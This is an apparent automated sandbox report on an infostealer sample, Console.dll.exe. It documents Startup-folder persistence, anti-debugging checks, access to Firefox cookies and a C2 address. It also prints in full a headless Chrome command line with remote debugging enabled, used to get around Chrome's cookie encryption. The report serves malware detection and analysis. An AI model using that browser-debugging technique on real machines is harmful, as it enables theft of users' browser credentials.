            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe TID: 7752Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01215200 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessAffinityMask,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,0_2_01215200
            Source: C:\Users\user\Desktop\Console.dll.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Console.dll.exe, 00000000.00000002.1630961022.0000000009A00000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1736658205.0000020FCDB37000.00000004.00000020.00020000.00000000.sdmp, Console.dll.exe, 00000007.00000003.1994359323.0000000008D30000.00000004.00000020.00020000.00000000.sdmp, Console.dll.exe, 00000007.00000002.2001847148.0000000008D3F000.00000004.00000020.00020000.00000000.sdmp, Console.dll.exe, 00000007.00000003.1994691480.0000000008D3F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2551193176.0000023E85508000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Console.dll.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01229A40 rdtsc 0_2_01229A40
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_011852A0 IsDebuggerPresent,0_2_011852A0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0141B5D0 LoadLibraryW,GetProcAddress,GetProcAddress,FreeLibrary,GetCurrentProcess,VirtualFree,VirtualFree,GetCurrentProcess,VirtualFree,GetCurrentProcess,VirtualProtect,0_2_0141B5D0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_012D2160 GetProcessHeap,HeapAlloc,0_2_012D2160
            Source: C:\Users\user\Desktop\Console.dll.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01418400 VirtualProtect,GetTickCount,VirtualProtect,GetSystemInfo,SetConsoleCtrlHandler,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,DebugBreak,SleepEx,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,RtlAddVectoredExceptionHandler,SetUnhandledExceptionFilter,InitializeCriticalSection,InitializeCriticalSection,VirtualAlloc,DebugBreak,InitializeCriticalSection,0_2_01418400
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_014AB6D9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_014AB6D9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_008E8400 VirtualProtect,GetTickCount,VirtualProtect,GetSystemInfo,SetConsoleCtrlHandler,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,DebugBreak,SleepEx,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,RtlAddVectoredExceptionHandler,SetUnhandledExceptionFilter,InitializeCriticalSection,InitializeCriticalSection,VirtualAlloc,DebugBreak,InitializeCriticalSection,7_2_008E8400
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_0097B6D9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0097B6D9
            Source: C:\Users\user\Desktop\Console.dll.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Contains functionality to prevent local Windows debugging
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01010950 IsDebuggerPresent,RaiseFailFastException,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,DebugBreak,SetErrorMode,SetErrorMode,0_2_01010950
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_004E0950 IsDebuggerPresent,RaiseFailFastException,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,DebugBreak,SetErrorMode,SetErrorMode,7_2_004E0950
            Source: C:\Users\user\Desktop\Console.dll.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"Jump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01478270 cpuid 0_2_01478270
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_012521F0 CreateNamedPipeA,GetLastError,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetLastError,CreateEventW,GetLastError,ConnectNamedPipe,GetLastError,0_2_012521F0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_014AC31E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_014AC31E

            Stealing of Sensitive Information

            barindex
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\Console.dll.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior

            Remote Access Functionality

            barindex
            Attempt to bypass Chrome Application-Bound Encryption
            Source: C:\Users\user\Desktop\Console.dll.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Command and Scripting Interpreter            		12
            Registry Run Keys / Startup Folder            		112
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API            		1
            DLL Side-Loading            		12
            Registry Run Keys / Startup Folder            		1
            Disable or Modify Tools            		LSASS Memory31
            Security Software Discovery            		Remote Desktop Protocol1
            Data from Local System            		11
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Remote Access Software            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook112
            Process Injection            		NTDS31
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeylogging1
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Console.dll.exe5%ReversingLabsWin32.Malware.Generic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\BouncyCastle.Crypto.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Console.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\EntityFramework.SqlServer.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\EntityFramework.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.CSharp.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Data.Sqlite.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.VisualBasic.Core.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.VisualBasic.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Win32.Primitives.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Win32.Registry.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Win32.SystemEvents.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Newtonsoft.Json.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SQLite.Interop.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SQLitePCLRaw.core.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SuperSocket.ClientEngine.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.AppContext.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Buffers.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.CodeDom.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Concurrent.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Immutable.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.NonGeneric.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Specialized.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.Annotations.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.DataAnnotations.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.EventBasedAsync.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.Primitives.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.TypeConverter.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Configuration.ConfigurationManager.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Configuration.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Console.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Core.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.Common.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.DataSetExtensions.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SQLite.EF6.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SQLite.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SqlClient.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Contracts.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Debug.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.DiagnosticSource.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.FileVersionInfo.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Process.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.StackTrace.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.TextWriterTraceListener.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Tools.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.TraceSource.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Tracing.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Drawing.Common.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Drawing.Primitives.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Drawing.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Dynamic.Runtime.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Formats.Asn1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Formats.Tar.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Globalization.Calendars.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://178.23.190.70:3000/00%Avira URL Cloudsafe
            https://www.vign.com/CPS040%Avira URL Cloudsafe
            http://anglebug.com/3625n0%Avira URL Cloudsafe
            http://178.23.190.70:3000/madbruh0%Avira URL Cloudsafe
            http://178.23.190.70:3000/madbruhX0%Avira URL Cloudsafe
            http://178.23.190.70:3000/d0%Avira URL Cloudsafe
            http://178.23.190.70:3000/madbruh)File0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://178.23.190.70:3000/madbruhfalse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://github.com/mono/linker/issues/1731Console.dll.exefalse
              		high
              http://anglebug.com/6651chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://anglebug.com/6574chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://anglebug.com/4830chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://aka.ms/dotnet/infoConsole.dll.exe, Console.dll.exe.0.drfalse
                      		high
                      http://anglebug.com/2970chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://anglebug.com/4633chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://anglebug.com/7382chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://issuetracker.google.com/284462263chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://aka.ms/dotnet/app-launch-failedConsole.dll.exe, Console.dll.exe.0.drfalse
                                		high
                                http://anglebug.com/3625nchrome.exe, 00000003.00000002.1739433697.00006EEC00244000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://anglebug.com/8162chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/mono/linker/issues/1895vConsole.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmpfalse
                                    		high
                                    http://anglebug.com/8280chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://issuetracker.google.com/220069903chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://anglebug.com/7308chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://anglebug.com/2162chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://anglebug.com/7714chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://anglebug.com/5430chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://anglebug.com/4901chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://anglebug.com/3498chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://aka.ms/nativeaot-compatibilityConsole.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpfalse
                                                      		high
                                                      http://anglebug.com/6248chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aka.ms/dotnet/downloadexcludingIgnoringConsole.dll.exe, Console.dll.exe.0.drfalse
                                                          		high
                                                          http://anglebug.com/6929chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://github.com/mono/linker/pull/649Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpfalse
                                                              		high
                                                              http://anglebug.com/5281chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
